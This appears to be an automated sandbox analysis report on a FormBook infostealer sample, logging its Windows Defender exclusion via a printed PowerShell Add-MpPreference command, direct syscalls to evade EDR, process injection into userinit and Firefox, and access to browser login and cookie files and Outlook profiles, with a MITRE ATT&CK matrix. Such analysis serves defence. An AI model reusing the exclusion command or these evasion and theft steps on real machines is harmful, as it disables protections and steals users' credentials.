            Source: C:\Users\user\Desktop\PO23100072.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\PO23100072.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe"
            Source: C:\Users\user\Desktop\PO23100072.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtClose: Direct from: 0x77462B6C
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: NULL target: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeSection loaded: NULL target: C:\Windows\SysWOW64\userinit.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: NULL target: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: NULL target: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\userinit.exeThread register set: target process: 5600Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\userinit.exeThread APC queued: target process: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess created: C:\Users\user\Desktop\PO23100072.exe "C:\Users\user\Desktop\PO23100072.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess created: C:\Users\user\Desktop\PO23100072.exe "C:\Users\user\Desktop\PO23100072.exe"Jump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exeProcess created: C:\Windows\SysWOW64\userinit.exe "C:\Windows\SysWOW64\userinit.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: FrMKpuEiehQ.exe, 00000007.00000000.1582152308.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 00000007.00000002.3905901359.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000000.1730762757.00000000016C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: FrMKpuEiehQ.exe, 00000007.00000000.1582152308.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 00000007.00000002.3905901359.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000000.1730762757.00000000016C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: FrMKpuEiehQ.exe, 00000007.00000000.1582152308.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 00000007.00000002.3905901359.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000000.1730762757.00000000016C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
            Source: FrMKpuEiehQ.exe, 00000007.00000000.1582152308.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 00000007.00000002.3905901359.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000000.1730762757.00000000016C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PO23100072.exeQueries volume information: C:\Users\user\Desktop\PO23100072.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.PO23100072.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.PO23100072.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.1660826698.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3906438503.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3909668348.00000000054A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3906350104.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1665615488.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3906324817.0000000004410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\userinit.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\userinit.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.PO23100072.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.PO23100072.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.1660826698.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3906438503.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3909668348.00000000054A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3906350104.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1665615488.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3906324817.0000000004410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		312
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Timestomp            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            DLL Side-Loading            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
